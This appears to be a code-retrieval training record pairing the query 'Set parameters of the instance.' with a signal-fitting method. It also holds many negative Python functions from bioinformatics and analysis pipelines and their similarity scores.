= self.ncbi_search(self.database, self.term)\n count = record[\"count\"]\n self.original_count = count\n\n self.main_organizer(count, record[\"qkey\"], record[\"webenv\"])\n except ProgramDone:\n return", "def run():\n build_no_documentation()\n build_sphinx_build()\n #build_sphinx_pdf()\n build_graphviz_files()", "def main():\r\n # Read dataset.\r\n reader = DatasetReader\r\n train_filename = sys.argv[1]\r\n test_filename = train_filename.replace('_train_', '_dev_')\r\n term_index, tag_index, train_data, test_data = reader.ReadData(train_filename, test_filename)\r\n (train_terms, train_tags, train_lengths) = train_data\r\n (test_terms, test_tags, test_lengths) = test_data\r\n\r\n model = SequenceModel(train_tags.shape[1], len(term_index), len(tag_index))\r\n model.build_inference()\r\n model.build_training()\r\n for j in range(5):\r\n model.train_epoch(train_terms,train_tags, train_lengths)\r\n print('Finished epoch %i. Evaluating ...' % (j+1))\r\n model.evaluate(test_terms, test_tags, test_lengths)", "def run(self, workbench, engine):\n pass", "def run(self):\n self.run_measurement()\n self.run_analysis()\n self.results = self.analysis.proc_data_dict['analysis_params_dict']\n if self.get_param_value('update'):\n self.run_update()\n self.dev.update_cancellation_params()\n\n if self.get_param_value('configure_mux_drive'):\n drive_lo_freqs = self.get_param_value('drive_lo_freqs')\n configure_qubit_mux_drive(self.qubits, drive_lo_freqs)", "def exec_blast(infile, config_file, out_name):\n\tdb, evalue = parse_config(config_file, \"blast\")\n\tfasta_string = SeqIO.read(infile, format=\"fasta\")\n\tresult_handle = NCBIWWW.qblast(\"blastp\", \"nr\", fasta_string.seq)\n\toutput= out_name + \".xml\"\n\tsave_file = open(output, \"w\")\n\tsave_file.write(result_handle.read())\n\tsave_file.close()\n\tresult_handle.close()\n\treturn (output)", "def main():\n import logging\n from pbtranscript.__init__ import get_version\n log = logging.getLogger(__name__)\n args = get_args()\n from pbtranscript.Utils import setup_log\n setup_log(alog=log, level=logging.DEBUG)\n log.info(\"Running {f} v{v}.\".format(f=op.basename(__file__),\n v=get_version()))\n\n splitFaFq(input_fa_or_fq=args.input_fa_or_fq,\n reads_per_split=args.reads_per_split,\n out_dir=args.out_dir,\n out_format=args.out_format,\n is_fq=args.is_fq)", "def main():\n op = help()\n for t in [\"bowtie2\", \"samtools\", \"bamToBed\"]:\n if not isTool(t):\n logger.error(\"%s not exits! Please install through conda.\" % t)\n return\n if not os.path.exists(op.fqd):\n logger.error(\"Input %s not exists! Return.\" % op.fqd)\n return\n if len(glob(op.ref + \"*.bt2\")) == 0:\n logger.error(\"Bowtie2 reference not exists for prefix of %s! Return.\" %\n op.ref)\n return\n if not os.path.exists(op.output):\n os.makedirs(op.output, exist_ok=True)\n else:\n fs = glob(os.path.join(op.output, \"*\"))\n if len(fs) > 0:\n logger.info(\n \"Target output directory %s is not empty, may over-write some files.\"\n % op.output)\n\n #mapping\n data = preFqs(op.fqd)\n if len(data) == 0:\n logger.error(\n \"No matched _R1.fastq.gz and _R2.fastq.gz in %s. Return.\" %\n (op.fqd))\n return\n ref = op.ref\n sams = Parallel(n_jobs=op.number,backend=\"multiprocessing\")(\n delayed(tracMapping)(sample, fqs, ref, op.output, cpus=op.cpu)\n for sample, fqs in data.items())\n sams = [sam for sam in sams if sam is not None]\n\n #sam to bam and bedpe\n cpus = op.number * op.cpu\n ncpus = int(min(len(sams), cpus / 2))\n bedpes = Parallel(n_jobs=ncpus,backend=\"multiprocessing\")(delayed(sam2bamBedpe)(sam) for sam in sams)\n\n #cLoops2 qc\n cmd = \"cLoops2 qc -f %s -o bedpeQc -p %s\" % (\",\".join(bedpes),\n min(len(bedpes), cpus))\n callSys([cmd], logger)\n\n #combine report\n mata = parseBowtielog()\n matb = pd.read_csv(\"bedpeQc_bedpeQc.txt\", index_col=0, sep=\"\\t\")\n matb.index = [i.split(\"_all\")[0] for i in matb.index]\n for c in matb.columns:\n mata[c] = matb[c]\n mata.to_csv(\"tracPre_summary.txt\", sep=\"\\t\")\n cmd = \"rm bedpeQc_bedpeQc.txt\"\n os.system(cmd)", "def asm_pipeline_cmd(sample_name):\n assert bool(TenxApp.config) is True, \"Must provide tenx yaml config file!\"\n sys.stderr.write(\"Run assembly pipeline for {}\\n\".format(sample_name))\n hostname = socket.gethostname()\n notifications.slack(\"{} START {}\".format(sample_name, hostname))\n sample = TenxSample(base_path=TenxApp.config[\"TENX_DATA_PATH\"], name=sample_name)\n asm = sample.assembly()\n try:\n run_pipeline(asm)\n except BaseException as ex:\n sys.stderr.write(\"Exception: {}\\n\".format(ex))\n sys.stderr.write(\"Exception encountered, sending notifications if configured...\\n\")\n notifications.slack(\"{} FAILED {}\".format(sample_name, socket.gethostname()))\n raise\n notifications.slack(\"{} SUCCESS {}\".format(sample_name, hostname))", "def analyze(ctx, filename, trigger, threshold, eyecandy, ignore_extra=False,\n fix_missing=False, output=None, notebook=None,\n configuration=None, verbose=False, debug=False,processes=None,\n by_channel=False, integrity_filter=0.0, analog_idx=1,\n default_channel_map=False, dev=False):\n print(\"version 0.5.1\")\n init_logging(filename, processes, verbose, debug)\n #### FILEPATHS\n logger.debug(str(filename) + \" \" + str(os.path.curdir))\n if not os.path.isfile(filename):\n try:\n filename = glia.match_filename(filename,\"txt\")\n except:\n try:\n filename = glia.match_filename(filename,\"bxr\")\n except:\n filename = glia.match_filename(filename,\"csv\")\n \n data_directory, data_name = os.path.split(filename)\n name, extension = os.path.splitext(data_name)\n # ignore first of two extensions (if applicable)\n name, _ = os.path.splitext(name)\n analog_file = os.path.join(data_directory, name +'.analog')\n if not os.path.isfile(analog_file):\n # use 3brain analog file\n analog_file = os.path.join(data_directory, name +'.analog.brw')\n\n if not os.path.isfile(analog_file):\n # Tyler's format; used if files were split for example\n analog_file = os.path.join(data_directory, name +'.analog.npz')\n\n stimulus_file = os.path.join(data_directory, name + \".stim\")\n ctx.obj = {\"filename\": os.path.join(data_directory,name)}\n print(f\"Analyzing {name}\")\n\n if configuration!=None:\n with open(configuration, 'r') as f:\n user_config = yaml.safe_load(f)\n config.user_config = user_config\n if \"analog_calibration\" in user_config:\n config.analog_calibration = user_config[\"analog_calibration\"]\n if \"notebook\" in user_config:\n notebook = user_config[\"notebook\"]\n if \"eyecandy\" in user_config:\n eyecandy = user_config[\"eyecandy\"]\n if \"processes\" in user_config:\n processes = user_config[\"processes\"]\n if \"integrity_filter\" in user_config:\n integrity_filter = user_config[\"integrity_filter\"]\n if \"by_channel\" in user_config:\n by_channel = user_config[\"by_channel\"]\n\n if not notebook:\n notebook = glia.find_notebook(data_directory)\n\n lab_notebook = glia.open_lab_notebook(notebook)\n logger.info(f\"{name=}\")\n experiment_protocol = glia.get_experiment_protocol(lab_notebook, name)\n flicker_version = experiment_protocol[\"flickerVersion\"]\n\n\n #### LOAD STIMULUS\n try:\n metadata, stimulus_list, method = glia.read_stimulus(stimulus_file)\n ctx.obj[\"stimulus_list\"] = stimulus_list\n ctx.obj[\"metadata\"] = metadata\n # assert method=='analog-flicker'\n except:\n print(\"No .stim file found. Creating from .analog file.\".format(trigger))\n if flicker_version==0.3:\n metadata, stimulus_list = glia.create_stimuli(\n analog_file, stimulus_file, notebook, name, eyecandy, analog_idx, ignore_extra,\n config.analog_calibration, threshold)\n ctx.obj[\"stimulus_list\"] = stimulus_list\n ctx.obj[\"metadata\"] = metadata\n print('finished creating .stim file')\n elif trigger == \"ttl\":\n raise ValueError('not implemented')\n else:\n raise ValueError(\"invalid trigger: {}\".format(trigger))\n \n # look for .frames file\n try:\n lab_notebook_notype = glia.open_lab_notebook(notebook, convert_types=False)\n protocol_notype = glia.get_experiment_protocol(lab_notebook_notype,\n name)\n date_prefix = os.path.join(data_directory,\n protocol_notype['date'].replace(':','_'))\n frames_file = date_prefix + \"_eyecandy_frames.log\"\n video_file = date_prefix + \"_eyecandy.mkv\"\n frame_log = pd.read_csv(frames_file)\n frame_log = frame_log[:-1] # last frame is not encoded for some reason\n ctx.obj[\"frame_log\"] = frame_log\n ctx.obj[\"video_file\"] = video_file\n except Exception as e:\n extype, value, tb = sys.exc_info()\n traceback.print_exc()\n print(e)\n ctx.obj[\"frame_log\"] = None\n ctx.obj[\"video_file\"] = None\n print(\"Attempting to continue without frame log...\")\n \n #### LOAD SPIKES\n spyking_regex = re.compile('.*\\.result.hdf5$')\n eye = experiment_protocol['eye']\n experiment_n = experiment_protocol['experimentNumber']\n\n date = experiment_protocol['date'].date().strftime(\"%y%m%d\")\n\n retina_id = date+'_R'+eye+'_E'+experiment_n\n if extension == \".txt\":\n ctx.obj[\"units\"] = glia.read_plexon_txt_file(filename,retina_id, channel_map)\n elif extension == \".bxr\":\n if default_channel_map:\n channel_map_3brain = config.channel_map_3brain\n else:\n channel_map_3brain = None\n ctx.obj[\"units\"] = glia.read_3brain_spikes(filename, retina_id,\n channel_map_3brain, truncate=dev)\n elif extension == \".csv\":\n ctx.obj[\"units\"] = glia.read_csv_spikes(filename, retina_id) \n elif re.match(spyking_regex, filename):\n ctx.obj[\"units\"] = glia.read_spyking_results(filename)\n else:\n raise ValueError(f'could not read {extension=}. Is it a plexon or spyking circus file?')\n\n #### DATA MUNGING OPTIONS\n if integrity_filter>0.0:\n good_units = solid.filter_units_by_accuracy(\n ctx.obj[\"units\"], ctx.obj['stimulus_list'], integrity_filter)\n filter_good_units = glia.f_filter(lambda u,v: u in good_units)\n ctx.obj[\"units\"] = filter_good_units(ctx.obj[\"units\"])\n\n if by_channel:\n ctx.obj[\"units\"] = glia.combine_units_by_channel(ctx.obj[\"units\"])\n\n\n # prepare_output\n plot_directory = os.path.join(data_directory, name+\"-plots\")\n config.plot_directory = plot_directory\n\n os.makedirs(plot_directory, exist_ok=True)\n os.chmod(plot_directory, 0o777)\n\n if output == \"pdf\":\n logger.debug(\"Outputting pdf\")\n ctx.obj[\"retina_pdf\"] = PdfPages(glia.plot_pdf_path(plot_directory, \"retina\"))\n ctx.obj[\"unit_pdfs\"] = glia.open_pdfs(plot_directory, list(ctx.obj[\"units\"].keys()), Unit.name_lookup())\n # c connotes 'continuation' for continuation passing style\n ctx.obj[\"c_unit_fig\"] = partial(glia.add_to_unit_pdfs,\n unit_pdfs=ctx.obj[\"unit_pdfs\"])\n ctx.obj[\"c_retina_fig\"] = lambda x: ctx.obj[\"retina_pdf\"].savefig(x)\n\n elif output == \"png\":\n logger.debug(\"Outputting png\")\n ctx.obj[\"c_unit_fig\"] = glia.save_unit_fig\n ctx.obj[\"c_retina_fig\"] = glia.save_retina_fig\n os.makedirs(os.path.join(plot_directory,\"00-all\"), exist_ok=True)\n\n for unit_id in ctx.obj[\"units\"].keys():\n name = unit_id\n os.makedirs(os.path.join(plot_directory,name), exist_ok=True)" ]
[ "0.5965446", "0.5941467", "0.5888768", "0.5804564", "0.57392657", "0.5699895", "0.5644962", "0.5548859", "0.5535779", "0.5506015", "0.54572743", "0.54180855", "0.5404095", "0.54018456", "0.53995997", "0.53812164", "0.53697616", "0.5368945", "0.5345558", "0.5340646", "0.5333773", "0.5324846", "0.53215164", "0.532145", "0.5311923", "0.5310135", "0.5288766", "0.5287111", "0.52798647", "0.5254399", "0.5253472", "0.5250674", "0.52332443", "0.52160335", "0.5208722", "0.52061", "0.52013814", "0.519535", "0.51884377", "0.5183631", "0.5182867", "0.518253", "0.5177152", "0.5176735", "0.51717913", "0.5139228", "0.51278853", "0.51244485", "0.51130253", "0.5112288", "0.5110361", "0.5101496", "0.5100255", "0.50972956", "0.5096399", "0.5090798", "0.50855446", "0.5084939", "0.5076215", "0.50756", "0.50747263", "0.5064195", "0.5062647", "0.5049706", "0.5046582", "0.5036209", "0.5026771", "0.50198144", "0.5019041", "0.50031453", "0.50001943", "0.49981198", "0.49970615", "0.49864095", "0.49855623", "0.4980293", "0.49714166", "0.49705303", "0.4966787", "0.4961691", "0.49586433", "0.49569666", "0.49533758", "0.49496102", "0.4940417", "0.4939942", "0.4938488", "0.49357465", "0.4925137", "0.49155885", "0.49120322", "0.49105346", "0.4909714", "0.48996636", "0.48942354", "0.48936334", "0.48929456", "0.4889576", "0.48892176", "0.4880262" ]
0.6089528
0
Set parameters of the instance.
def fit(self, signal): if signal.ndim == 1: self.signal = signal.reshape(-1, 1) else: self.signal = signal return self
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_params(self):\n raise NotImplementedError", "def set_params(self, **kwargs):\n ...", "def set_params(self):\r\n pass", "def set_params(self, params):", "def set_params(self, **kwargs) -> NoReturn:\n pass", "def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.gtg.set_parameters(self.parameters)\n self.avoidobstacles.set_parameters(self.parameters)\n self.wall.set_parameters(self.parameters)", "def set_params(self, **params):\n self.check_params(params)\n self.sk_params.update(params)\n return self", "def _set_parameters(self, parameters):\n self.parameters = parameters\n self._set_points_and_weights()", "def set_params(self, **params: Any) -> Self:\n return _set_params(self, **params)", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.blending.set_parameters(self.parameters)", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n\n for key, value in params.items():\n if hasattr(self, key):\n setattr(self, key, value)\n else:\n self.kwargs[key] = value\n\n return self", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_parameters(self, params):\n self.kp = params.pgain", "def setParams(self, paramSet):\r\n pass", "def set_params(self, *arg):\n pass", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params)\n\n return self", "def params(self,new):\n self._params = new\n self._config_set()\n self._make_model()", "def set_params(self, **parameters):\n for parameter, value in parameters.items():\n if parameter == 'predictor':\n if isinstance(value, chainer.Link):\n del self.predictor\n with self.init_scope():\n self.predictor = value\n else:\n assert False, 'predictor is not Chain instance'\n elif parameter in ['lossfun', 'accfun', 'device']:\n setattr(self, parameter, value)\n else:\n self.sk_params.update({parameter: value})\n return self", "def set_params(self, *, params: Params) -> None: # pragma: no cover\n\t\tsuper().set_params(params=params)", "def set_params(self, **params):\n return super().set_params(**params)", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def set_params(self, **params):\n\n return super().set_params(**params)", "def setParameters(self):\n\n # Set the parameters\n self.taux = 24.2\n self.mu = 0.23\n self.G = 33.75\n self.alpha_0 = 0.05\n self.delta = 0.0075\n self.p = 0.50\n self.I0 = 9500.0\n self.kparam = 0.55", "def _set_params(self, *args, **kwargs):\n\n params = args[0]\n\n # check for attempt to set readonly parameters (read-only or immutable set outside startup)\n self._verify_not_readonly(*args, **kwargs)\n old_config = self._param_dict.get_config()\n\n for (key, val) in params.iteritems():\n log.debug(\"KEY = \" + str(key) + \" VALUE = \" + str(val))\n self._param_dict.set_value(key, val)\n\n new_config = self._param_dict.get_config()\n # check for parameter change\n if not dict_equal(old_config, new_config):\n self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)", "def set_user_parameters(self, **params: dict):\n\n assert params, \"params variable can't be None\"\n for p, val in params.items():\n setattr(self, p, val)\n self.construct_repr_length()", "def set_parameters(self):\n\n if self.model_with_set_params:\n return\n\n self._model_with_set_params = self._parameter_values.process_model(\n self._unprocessed_model, inplace=False\n )\n self._parameter_values.process_geometry(self.geometry)\n self.model = self._model_with_set_params", "def set_params(self, params: Dict):\n\n if params['training_instances'] is not None:\n self.training_instances = params['training_instances']\n if params['n'] is not None:\n self.n = params['n']\n if params['lda'] is not None:\n self.lda = params['lda']\n if params['verbose'] is not None:\n self.verbose = params['verbose']\n\n self.num_features = self.training_instances[0].get_feature_count()\n self.w = None\n self.b = None", "def setParameters(self, izParameters): #$NON-NLS-1$\r", "def set_parameters(self, *args, **kwargs):\n if len(args) > 0:\n if hasattr(args[0], '__iter__'):\n self._parameters = self._Parameters(*args[0])\n elif args[0] is None:\n self._parameters = self._Parameters()\n else:\n self._parameters = self._Parameters(*args)\n else:\n self._parameters = self._Parameters(**kwargs)", "def _set_params(self,x):\r\n self.k._set_params(x)", "def set_params(self, params):\n params = dict_to_namespace(params)\n\n # Set self.params\n self.params = Namespace()\n self.params.ndimx = params.ndimx\n self.params.model_str = getattr(params, 'model_str', 'optfixedsig')\n self.params.ig1 = getattr(params, 'ig1', 4.0)\n self.params.ig2 = getattr(params, 'ig2', 3.0)\n self.params.n1 = getattr(params, 'n1', 1.0)\n self.params.n2 = getattr(params, 'n2', 1.0)\n self.params.sigma = getattr(params, 'sigma', 1e-5)\n self.params.niter = getattr(params, 'niter', 70)\n self.params.kernel = getattr(params, 'kernel', kern_matern)\n self.params.trans_x = getattr(params, 'trans_x', False)", "def set(self, **parameters):\r\n for name in parameters:\r\n if name in self.prm:\r\n self.prm[name] = parameters[name]\r\n else:\r\n self._illegal_parameter(name)", "def set_params(self, **kwargs):\n for param_name, value in kwargs.iteritems():\n # only set parameters that are in the default\n if param_name in self._default_params():\n setattr(self, param_name, value)\n self.params[param_name] = value\n else:\n print('AdjustedStat class does not accept %s as a ' \\\n 'parameter and will be ignored' % param_name)", "def setParameters(self, params):\n self.module._setParameters(params)\n # update parameters for learner\n self.learner.setModule(self.module)", "def set(self, **kwargs):\n raise NotImplementedError", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def set_params(self, w, b):\n self.w = w\n self.b = b\n return", "def set_params(self, **params):\n return self.forest.set_params(**params)", "def set_shape_params(self, params):\n self.alpha = params[0]\n self.beta = params[1]\n self.gamma = params[2]\n self.c500 = params[3]\n self.P0 = params[4]", "def setParameter(self, name, value):", "def set_params(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.params.keys():\n self.params[key] = value\n else:\n raise KeyError", "def set_hyperparams(self, params):", "def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']", "def updateParameters(self, parameters):", "def set_params(self, state_dicts):\n raise NotImplementedError", "def _set_params(self, *args, **kwargs):\n try:\n params = args[0]\n except IndexError:\n raise InstrumentParameterException('Set command requires a parameter dict.')\n\n self._verify_not_readonly(*args, **kwargs)\n update_params = False\n\n # check values that the instrument doesn't validate\n # handle special cases for driver specific parameters\n for (key, val) in params.iteritems():\n if key == Parameter.PUMP_DELAY and (val < MIN_PUMP_DELAY or val > MAX_PUMP_DELAY):\n raise InstrumentParameterException(\"pump delay out of range\")\n elif key == Parameter.NUM_AVG_SAMPLES and (val < MIN_AVG_SAMPLES or val > MAX_AVG_SAMPLES):\n raise InstrumentParameterException(\"num average samples out of range\")\n\n for (key, val) in params.iteritems():\n\n old_val = self._param_dict.format(key)\n new_val = self._param_dict.format(key, val)\n log.debug(\"KEY = %r OLD VALUE = %r NEW VALUE = %r\", key, old_val, new_val)\n\n if old_val != new_val:\n update_params = True\n if ConfirmedParameter.has(key):\n # We add a write delay here because this command has to be sent\n # twice, the write delay allows it to process the first command\n # before it receives the beginning of the second.\n self._do_cmd_resp(Command.SET, key, val, write_delay=0.2)\n else:\n self._do_cmd_resp(Command.SET, key, val, **kwargs)\n\n log.debug(\"set complete, update params\")\n self._update_params()\n if update_params:\n self._update_params()", "def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)", "def __init__(self, **parameters):\n self.parameters = parameters", "def set_parameters(self, **kwargs):\n\n invalid_params = set(self.parameter_names).difference(kwargs.keys())\n if invalid_params:\n raise ValueError(\n \"unknown parameters: {}\".format(\", \".join(invalid_params))) \n \n for parameter_name, value in kwargs.items():\n setattr(self, \"_{}\".format(parameter_name), value)\n\n return kwargs", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params[\"kwargs\"])\n self.save_smooth = params.get(\"save_smooth\", self.save_smooth)\n\n return self", "def update_params(self):\n pass", "def setParams(self, disable=False):\n if hasattr(self, \"_input_kwargs\"):\n kwargs = self._input_kwargs\n else:\n kwargs = self.__init__._input_kwargs\n return self._set(**kwargs)", "def updateParameters(self):\n\n return", "def __init__(self, **attributes):\n self.set(**attributes)", "def update(self, **params):\n self.parameters.update(params)", "def define_parameters(self):", "def __init__( self, parameters={} ):\n self.params = {}", "def set_parameters(self, **kwargs):\n self.__select_k_best.set_params(**kwargs)", "def set_params(self, **kwargs):\n warnings.warn(\"'set_params()' not defined for locator of type \" +\n str(type(self)))", "def set_params(self, dic):\n if dic is not None:\n for key, val in zip(dic.keys(), dic.values()):\n if key in self.__dict__.keys():\n if isinstance(self.__dict__[key], Parameter):\n if isinstance(val, Parameter):\n self.__dict__[key] = val\n else:\n d = self.__dict__[key].__dict__\n self.__dict__[key] = Parameter(val, input_dimensional=d['_input_dimensional'],\n units=d['_units'],\n description=d['_description'],\n scale_object=d['_scale_object'],\n return_dimensional=d['_return_dimensional'])\n else:\n self.__dict__[key] = val", "def __init__( self, parameters={} ):\n self.params = {}\n self.reset(parameters)", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params[\"g_leak\"])\n self.kvhh.set_g(params[\"g_kvhh\"])\n self.cav.set_g(params[\"g_cav\"])\n self.kca.set_g(params[\"g_kca\"])\n self.nap.set_g(params[\"g_nap\"])\n self.tau_ca = params[\"t_ca\"]", "def set_params(self, **kwargs):\n if 'nbins' in kwargs:\n self._nbins = kwargs['nbins']\n if self._nbins != 'auto':\n self._nbins = int(self._nbins)\n if 'symmetric' in kwargs:\n self._symmetric = kwargs['symmetric']\n if 'prune' in kwargs:\n prune = kwargs['prune']\n if prune is not None and prune not in ['upper', 'lower', 'both']:\n raise ValueError(\n \"prune must be 'upper', 'lower', 'both', or None\")\n self._prune = prune\n if 'min_n_ticks' in kwargs:\n self._min_n_ticks = max(1, kwargs['min_n_ticks'])\n if 'steps' in kwargs:\n steps = kwargs['steps']\n if steps is None:\n self._steps = [1, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10]\n else:\n self._steps = self._validate_steps(steps)\n self._extended_steps = self._staircase(self._steps)\n if 'integer' in kwargs:\n self._integer = kwargs['integer']", "def init(self, parameters):\n pass", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n valid_params = self.get_params(deep=True)\n\n nested_params = defaultdict(dict) # grouped by prefix\n for key, value in params.items():\n key, delim, sub_key = key.partition('__')\n if key not in valid_params:\n raise EstimatorParameterError(\n 'Invalid parameter %s for estimator %s. '\n 'Check the list of available parameters '\n 'with `estimator.get_params().keys()`.' % (key, self))\n\n if delim:\n nested_params[key][sub_key] = value\n else:\n setattr(self, key, value)\n valid_params[key] = value\n\n for key, sub_params in nested_params.items():\n valid_params[key].set_params(**sub_params)\n\n return self", "def set_params(self, params_):\n x_start, x_end = params_[\"lim_fit\"]\n self.find_idx_of_fit_limit(x_start, x_end)\n self.is_error_bar_for_fit = params_[\"use_error_bar\"]\n self.fitting_method1 = params_[\"method1\"]\n self.fitting_method2 = params_[\"method2\"]\n self.qty_to_min = params_[\"qty_to_min\"]\n\n for i, key in enumerate(self.params):\n # self.params[key].set(value=params_[\"val\"][i], min=params_[\"min\"][i], max=params_[\"max\"][i], vary=bool(params_[\"hold\"][i]), brute_step=params_[\"brute_step\"][i])\n if self.params[key].user_data is not None:\n if \"dontGenerate\" in self.params[key].user_data:\n continue\n self.params[key].set(value=params_[key][\"value\"], min=params_[key][\"min\"], max=params_[key][\"max\"], vary=params_[key][\"vary\"], brute_step=params_[key][\"b_step\"])", "def set(self, *, pad=None, w_pad=None, h_pad=None, rect=None):\n for td in self.set.__kwdefaults__:\n if locals()[td] is not None:\n self._params[td] = locals()[td]", "def setup(self, **kwargs):\n\n for k, v in kwargs.items():\n setattr(self, k, v)", "def _set_controller_parameters(self, P=None, I=None, D=None):\n pass", "def set_params(self, dG=None, dH=None, dCp=None ):\n\n\t\tif len(self.dG) > 0 and dG != None:\n\t\t\tassert( len(self.dG) == len(dG) )\n\t\tif len(self.dG) > 0 and dH != None:\n\t\t\tassert( len(self.dG) == len(dH) )\n\t\tif len(self.dG) > 0 and dCp != None:\n\t\t\tassert( len(self.dG) == len(dCp) )\n\n\t\t# note, dG & dH values are always at ref temp!\n\t\tif dG != None:\n\t\t\tself.dG\t\t=\tdG\n\t\tif dH != None:\n\t\t\tself.dH\t\t=\tdH\n\t\tif dCp != None:\n\t\t\tself.dCp\t=\tdCp\n\n\t\treturn", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params['g_leak'])\n self.nav.set_g(params['g_nav'])\n self.kvhh.set_g(params['g_kvhh'])\n self.kva.set_g(params['g_kva'])\n self.kvsi.set_g(params['g_kvsi'])\n self.cav.set_g(params['g_cav'])\n self.kca.set_g(params['g_kca'])\n self.nap.set_g(params['g_nap'])\n self.kir.set_g(params['g_kir'])\n self.ampar.set_g(params['g_ampar'])\n self.nmdar.set_g(params['g_nmdar'])\n self.gabar.set_g(params['g_gabar'])\n self.tau_ca = params['t_ca']", "def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)", "def _set_params(self, *args, **kwargs):\n startup = False\n try:\n params = args[0]\n except IndexError:\n raise InstrumentParameterException('Set command requires a parameter dict.')\n\n try:\n startup = args[1]\n except IndexError:\n pass\n\n # Only check for readonly parameters if we are not setting them from startup\n if not startup:\n readonly = self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY)\n\n log.debug(\"set param, but check visibility first\")\n log.debug(\"Read only keys: %s\", readonly)\n\n for (key, val) in params.iteritems():\n if key in readonly:\n raise InstrumentParameterException(\"Attempt to set read only parameter (%s)\" % key)\n\n # Make sure this method is overloaded because this just verifies, but doesn't\n # set a damn thing.", "def set_parameter(self, params, name, val):\n raise NotImplementedError()", "def set(self, params, relink=None):\n # Fast path 'set(get())'-like\n if params is self._params:\n return\n # Assignment\n if (self._config.relink if relink is None else relink):\n tools.relink(self._model.parameters(), params)\n self._params = params\n else:\n self._params.copy_(params, non_blocking=self._config[\"non_blocking\"])", "def set(self, *, h_pad=None, w_pad=None,\n hspace=None, wspace=None, rect=None):\n for td in self.set.__kwdefaults__:\n if locals()[td] is not None:\n self._params[td] = locals()[td]", "def set_params(self, **params):\n\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n valid_params = self.get_params(deep=True)\n\n nested_params = defaultdict(dict) # grouped by prefix\n for key, value in params.items():\n key, delim, sub_key = key.partition('__')\n if key not in valid_params:\n raise ValueError('Invalid parameter %s for regressor %s. '\n 'Check the list of available parameters '\n 'with `regressor.get_params().keys()`.' %\n (key, self))\n\n if delim:\n nested_params[key][sub_key] = value\n else:\n setattr(self._regressor, key, value)\n valid_params[key] = value\n\n for key, sub_params in nested_params.items():\n valid_params[key].set_params(**sub_params)\n\n return self", "def set_params(self, **kwargs):\n\n # We don't want non-functional arguments polluting kwargs\n params = kwargs.copy()\n for k in ['function', 'target']:\n params.pop(k, None)\n\n self.kwargs.update(params)\n BaseEstimator.set_params(self, **kwargs)", "def set_params(self, **kargs):\n\n # may further modify parameters manually\n if len(kargs) > 0:\n for key in kargs:\n if key in self.params[self.profile].keys():\n self.params[self.profile][key] = kargs[key]\n else:\n print '%s not a standard key. Will not be used.' % (key)\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def set_parameters(self, create_models=True, **parameters):\n flag_nn_opti = False\n\n # Set attributes\n for param, value in parameters.items():\n if param in self.DEFAULT_VALUES.keys():\n if getattr(self, param) != value:\n # We change param value\n setattr(self, param, value)\n if param in ['hidden_layers', 'lr']:\n flag_nn_opti = True\n\n else:\n raise Exception(f'Parameter {param} not known.')\n\n # Create torch instances\n if create_models and flag_nn_opti:\n self._create_networks_and_optimizer()", "def set_parameters(self, L, r):\n self.L = L\n self.r = r", "def __init__(self, *args, **kwargs):\n self._rcParams = {}\n self.update(*args, **kwargs)", "def set_params(self, **params):\n if not hasattr(self, \"_non_sklearn_base\"):\n return super().set_params(**params)\n if not (\n len(params) == 1 and\n (\"nthreads\" in params or 